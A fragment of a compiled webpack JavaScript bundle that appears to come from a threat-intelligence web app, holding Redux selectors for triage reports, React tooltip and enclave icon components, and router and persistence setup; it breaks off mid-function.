/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2944);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 903 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(2945);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(573);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2946);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2947);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(724);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "types", function() { return __WEBPACK_IMPORTED_MODULE_4__types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_js__ = __webpack_require__(1324);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "utils", function() { return __WEBPACK_IMPORTED_MODULE_5__utils_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants_js__ = __webpack_require__(1323);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "constants", function() { return __WEBPACK_IMPORTED_MODULE_6__constants_js__; });















/***/ }),
/* 904 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(2948);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(574);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2949);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2950);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(726);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "types", function() { return __WEBPACK_IMPORTED_MODULE_4__types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_js__ = __webpack_require__(1326);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "utils", function() { return __WEBPACK_IMPORTED_MODULE_5__utils_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants_js__ = __webpack_require__(1325);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "constants", function() { return __WEBPACK_IMPORTED_MODULE_6__constants_js__; });















/***/ }),
/* 905 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return searchResponse; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  enclaveFilters: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(),
  includeCommunity: true
});

var searchResponse = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  data: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])(),
  moreResults: false,
  pageNumber: 0,
  totalPageElements: 0,
  totalPages: 0,
  loading: false,
  error: false
});

// Like payload action but also supports field to update

/***/ }),
/* 906 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__getters_js__ = __webpack_require__(3207);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_0__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__actions_js__ = __webpack_require__(3208);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_1__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(3209);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(3210);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 907 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(3419);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__defaults_js__ = __webpack_require__(1467);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "defaults", function() { return __WEBPACK_IMPORTED_MODULE_1__defaults_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__getters_js__ = __webpack_require__(797);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_2__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(3420);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__epics_js__ = __webpack_require__(3421);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_4__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types_js__ = __webpack_require__(798);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "types", function() { return __WEBPACK_IMPORTED_MODULE_5__types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils_js__ = __webpack_require__(1469);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "utils", function() { return __WEBPACK_IMPORTED_MODULE_6__utils_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__constants_js__ = __webpack_require__(1468);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "constants", function() { return __WEBPACK_IMPORTED_MODULE_7__constants_js__; });

















/***/ }),
/* 908 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isSetTriageStatusInProgress", function() { return isSetTriageStatusInProgress; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isFetchTriageReportsInProgress", function() { return isFetchTriageReportsInProgress; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "triageSubmissions", function() { return triageSubmissions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentTriageQuery", function() { return currentTriageQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getLoadingMessage", function() { return getLoadingMessage; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultTriageRequestPayload", function() { return defaultTriageRequestPayload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "initialTriageSubmissionsState", function() { return initialTriageSubmissionsState; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getTriageReportsWithMetadata", function() { return getTriageReportsWithMetadata; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enrichedTriageReports", function() { return enrichedTriageReports; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_hooks_constants__ = __webpack_require__(877);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_utils_Date_constants__ = __webpack_require__(236);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_reports_getters__ = __webpack_require__(215);







var isSetTriageStatusInProgress = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['triage', 'isSetTriageStatusInProgress']);
var isFetchTriageReportsInProgress = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['triage', 'isFetchTriageReportsInProgress']);

var triageSubmissions = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['triage', 'triageSubmissions']);
var currentTriageQuery = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['triage', 'currentTriageQuery']);

var getLoadingMessage = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['triage', 'loadingMessage']);

// Default Payloads
var defaultTriageRequestPayload = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({
  from: Date.parse(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_utils_Date_constants__["a" /* default */].YESTERDAY.toString()),
  to: Date.now(),
  enclaveIds: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])([]),
  priorityEventScore: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(__WEBPACK_IMPORTED_MODULE_3_trustar_2_0_hooks_constants__["g" /* TRIAGE_STATUS_OPTIONS */]),
  normalizedIndicatorScore: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(__WEBPACK_IMPORTED_MODULE_3_trustar_2_0_hooks_constants__["g" /* TRIAGE_STATUS_OPTIONS */]),
  status: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])([__WEBPACK_IMPORTED_MODULE_3_trustar_2_0_hooks_constants__["b" /* PHISHING_SCORE_VALUES */].UNRESOLVED])
});

var initialTriageSubmissionsState = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({
  items: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  responseMetadata: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({
    nextCursor: '',
    totalItems: 0
  })
});

var getTriageReportsWithMetadata = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([triageSubmissions, __WEBPACK_IMPORTED_MODULE_5_modules_reports_getters__["metadataCache"]], function (triageReports, metadata) {
  return triageReports.update('items', function (reports) {
    return reports.filter(function (report) {
      return metadata.get(report.get('submissionId'));
    });
  });
});

/* Merge reports search results with reports metadata and summary data */
var enrichedTriageReports = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([triageSubmissions, __WEBPACK_IMPORTED_MODULE_5_modules_reports_getters__["metadataCache"], isFetchTriageReportsInProgress], function (triageReports, metadata, isFetchTriageReportsInProgress) {
  return triageReports.update('items', function (reports) {
    return reports.map(function (report) {
      var reportGuid = report.get('submissionId');
      var title = report.get('title');
      var reportMetadata = metadata.get(reportGuid, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])());

      // Used to show logos. This map's shape is derived from the summary endpoint source information
      // for interchangability between payloads.
      var sourceKeyAndName = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({
        source: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({
          key: report.get('sourceKey'),
          name: report.get('sourceName')
        })
      });

      return {
        reportGuid: reportGuid,
        sourceKeyAndName: sourceKeyAndName,
        reportMetadata: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["merge"])(reportMetadata, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ title: title })),
        context: report.get('context', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()),
        priorityEventScore: report.get('priorityEventScore', -1),
        reportMetadataLoading: isFetchTriageReportsInProgress,
        scoreCount: report.get('scoreCount', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])())
      };
    });
  });
});

/***/ }),
/* 909 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return TooltipWrapper; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return StyledDefaultTooltip; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_uuid__ = __webpack_require__(405);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_uuid___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_uuid__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

/* eslint react/no-multi-comp: 0, react/prop-types: 0 */





/**
 * Taken from reactstrap examples and modded a bit
 * TODO: Make it our own
 */

var StyledDefaultTooltip = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].span.withConfig({
  displayName: 'TooltipWrapper__StyledDefaultTooltip',
  componentId: 'v7qyx0-0'
})(['background:', ';color:white;padding:0.1rem 0.5rem;border-radius:0.25rem;'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.DARK.hex;
});

// Bindings


var initialValues = {
  autohide: true,
  placement: 'right',
  delay: {
    show: 100,
    hide: 100
  }
};

var TooltipWrapper = function (_React$Component) {
  _inherits(TooltipWrapper, _React$Component);

  function TooltipWrapper(props) {
    _classCallCheck(this, TooltipWrapper);

    var _this = _possibleConstructorReturn(this, (TooltipWrapper.__proto__ || Object.getPrototypeOf(TooltipWrapper)).call(this, props));

    _this.toggle = _this.toggle.bind(_this);
    _this.state = {
      tooltipOpen: false
    };
    return _this;
  }

  _createClass(TooltipWrapper, [{
    key: 'componentDidMount',
    value: function componentDidMount() {
      if (this.props.forceOpen) {
        this.setState({ tooltipOpen: true });
      }
    }
  }, {
    key: 'toggle',
    value: function toggle() {
      // Keep the tooltip open when forceOpen prop is set. (SINT-1556)
      this.setState({
        tooltipOpen: this.props.forceOpen || !this.state.tooltipOpen
      });
    }
  }, {
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        { className: this.props.className, id: 'ttp-' + this.props.id },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_1_reactstrap__["Tooltip"],
          { autohide: this.props.autohide, placement: this.props.placement, delay: this.props.delay, isOpen: this.state.tooltipOpen && !this.props.preventOpen, target: 'ttp-' + this.props.id, toggle: this.toggle },
          this.props.tooltip
        ),
        this.props.children
      );
    }
  }]);

  return TooltipWrapper;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

TooltipWrapper.defaultProps = initialValues;




/***/ }),
/* 910 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return EnclaveIcon; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return AdditionalEnclavesIcon; });
/* unused harmony export CommunityIcon */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_img_ts_logo_color_svg__ = __webpack_require__(1629);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_img_ts_logo_color_svg___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_trustar_img_ts_logo_color_svg__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__EnclaveIcon_styl__ = __webpack_require__(3637);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__EnclaveIcon_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3__EnclaveIcon_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }






var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_3__EnclaveIcon_styl___default.a);

/**
 * Render an icon given an enclave object.
 *
 * NOTE: This if 'Community' logic is not great since it's relying on a name
 * that we haven't standardized on the back end. For now it's just made up. If
 * community really is going to be an enclave we should make that a reality
 * rather than just having the UI represent it as such
 *
 * NOTE: I'm using class components here so that we can wrap these in tooltips.
 * The current tooltip implementation relies on refs which don't work on
 * functional components.
 */
var EnclaveIcon = function (_React$PureComponent) {
  _inherits(EnclaveIcon, _React$PureComponent);

  function EnclaveIcon() {
    _classCallCheck(this, EnclaveIcon);

    return _possibleConstructorReturn(this, (EnclaveIcon.__proto__ || Object.getPrototypeOf(EnclaveIcon)).apply(this, arguments));
  }

  _createClass(EnclaveIcon, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          className = _props.className,
          enclave = _props.enclave;
      var name = enclave.name,
          color = enclave.color,
          iconUrl = enclave.iconUrl;
      // See NOTE

      if (!name) {
        iconUrl = __WEBPACK_IMPORTED_MODULE_2_trustar_img_ts_logo_color_svg___default.a;
      }

      if (!color) color = 'gray'; // default if color is undefined for some reason

      return iconUrl ? __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        { className: cx('container', className) },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', { src: iconUrl, alt: 'Enclave icon' })
      ) : __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        { className: cx('container', 'default', className, color) },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('div', { className: cx('innerSlice') })
      );
    }
  }]);

  return EnclaveIcon;
}(__WEBPACK_IMPORTED_MODULE_0_react__["PureComponent"]);

/* Shows placeholder icon to fill for 'more' enclaves which overflow container,
 * e.g. 5+, 11+, 27+ etc. */
var AdditionalEnclavesIcon = function (_React$PureComponent2) {
  _inherits(AdditionalEnclavesIcon, _React$PureComponent2);

  function AdditionalEnclavesIcon() {
    _classCallCheck(this, AdditionalEnclavesIcon);

    return _possibleConstructorReturn(this, (AdditionalEnclavesIcon.__proto__ || Object.getPrototypeOf(AdditionalEnclavesIcon)).apply(this, arguments));
  }

  _createClass(AdditionalEnclavesIcon, [{
    key: 'render',
    value: function render() {
      var _props2 = this.props,
          count = _props2.count,
          className = _props2.className;

      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        { className: cx('container', 'default', 'teal', className) },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'span',
          { className: cx('num-of-additional-enclaves') },
          '+',
          count
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('div', { className: cx('innerSlice') })
      );
    }
  }]);

  return AdditionalEnclavesIcon;
}(__WEBPACK_IMPORTED_MODULE_0_react__["PureComponent"]);

/* Icon for Community */
var CommunityIcon = function (_React$PureComponent3) {
  _inherits(CommunityIcon, _React$PureComponent3);

  function CommunityIcon() {
    _classCallCheck(this, CommunityIcon);

    return _possibleConstructorReturn(this, (CommunityIcon.__proto__ || Object.getPrototypeOf(CommunityIcon)).apply(this, arguments));
  }

  _createClass(CommunityIcon, [{
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](EnclaveIcon, _extends({}, this.props, {
        enclave: { iconUrl: __WEBPACK_IMPORTED_MODULE_2_trustar_img_ts_logo_color_svg___default.a, name: 'Community' }
      }));
    }
  }]);

  return CommunityIcon;
}(__WEBPACK_IMPORTED_MODULE_0_react__["PureComponent"]);

/***/ }),
/* 911 */,
/* 912 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export route */
/* unused harmony export router */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return currentBaseRoute; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);




var route = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['router', 'locationBeforeTransitions']);
var router = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['router']);

var currentBaseRoute = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([router], function (router) {
  var location = router.locationBeforeTransitions.pathname;

  var routeRungs = location.split('/').filter(function (string) {
    return !!string;
  }); // No empty strings por favor
  return routeRungs[0];
});

/***/ }),
/* 913 */,
/* 914 */,
/* 915 */,
/* 916 */,
/* 917 */,
/* 918 */,
/* 919 */,
/* 920 */,
/* 921 */,
/* 922 */,
/* 923 */,
/* 924 */,
/* 925 */,
/* 926 */,
/* 927 */,
/* 928 */,
/* 929 */,
/* 930 */,
/* 931 */,
/* 932 */,
/* 933 */,
/* 934 */,
/* 935 */,
/* 936 */,
/* 937 */,
/* 938 */,
/* 939 */,
/* 940 */,
/* 941 */,
/* 942 */,
/* 943 */,
/* 944 */,
/* 945 */,
/* 946 */,
/* 947 */,
/* 948 */,
/* 949 */,
/* 950 */,
/* 951 */,
/* 952 */,
/* 953 */,
/* 954 */,
/* 955 */,
/* 956 */,
/* 957 */,
/* 958 */,
/* 959 */,
/* 960 */,
/* 961 */,
/* 962 */,
/* 963 */,
/* 964 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});

var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

exports.routerReducer = routerReducer;
/**
 * This action type will be dispatched when your history
 * receives a location change.
 */
var LOCATION_CHANGE = exports.LOCATION_CHANGE = '@@router/LOCATION_CHANGE';

var initialState = {
  locationBeforeTransitions: null
};

/**
 * This reducer will update the state with the most recent location history
 * has transitioned to. This may not be in sync with the router, particularly
 * if you have asynchronously-loaded routes, so reading from and relying on
 * this state is discouraged.
 */
function routerReducer() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : initialState;

  var _ref = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {},
      type = _ref.type,
      payload = _ref.payload;

  if (type === LOCATION_CHANGE) {
    return _extends({}, state, { locationBeforeTransitions: payload });
  }

  return state;
}

/***/ }),
/* 965 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});
/**
 * This action type will be dispatched by the history actions below.
 * If you're writing a middleware to watch for navigation events, be sure to
 * look for actions of this type.
 */
var CALL_HISTORY_METHOD = exports.CALL_HISTORY_METHOD = '@@router/CALL_HISTORY_METHOD';

function updateLocation(method) {
  return function () {
    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return {
      type: CALL_HISTORY_METHOD,
      payload: { method: method, args: args }
    };
  };
}

/**
 * These actions correspond to the history API.
 * The associated routerMiddleware will capture these events before they get to
 * your reducer and reissue them as the matching function on your history.
 */
var push = exports.push = updateLocation('push');
var replace = exports.replace = updateLocation('replace');
var go = exports.go = updateLocation('go');
var goBack = exports.goBack = updateLocation('goBack');
var goForward = exports.goForward = updateLocation('goForward');

var routerActions = exports.routerActions = { push: push, replace: replace, go: go, goBack: goBack, goForward: goForward };

/***/ }),
/* 966 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.purgeStoredState = exports.persistStore = exports.getStoredState = exports.createTransform = exports.createPersistor = exports.autoRehydrate = undefined;

var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _reduxPersist = __webpack_require__(967);

var _reduxPersistTransformImmutable = __webpack_require__(1935);

var _reduxPersistTransformImmutable2 = _interopRequireDefault(_reduxPersistTransformImmutable);

var _operators = __webpack_require__(1936);

var operators = _interopRequireWildcard(_operators);

var _reconciler = __webpack_require__(1937);

function _interopRequireWildcard(obj) { if (obj && obj.__esModule) { return obj; } else { var newObj = {}; if (obj != null) { for (var key in obj) { if (Object.prototype.hasOwnProperty.call(obj, key)) newObj[key] = obj[key]; } } newObj.default = obj; return newObj; } }

function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }

function _toConsumableArray(arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) { arr2[i] = arr[i]; } return arr2; } else { return Array.from(arr); } }

var extendConfig = function extendConfig(config) {
  var incomingTransforms = config.transforms || [];
  var records = config.records || null;
  var transforms = incomingTransforms;
  if (!config.skipImmutableTransform) {
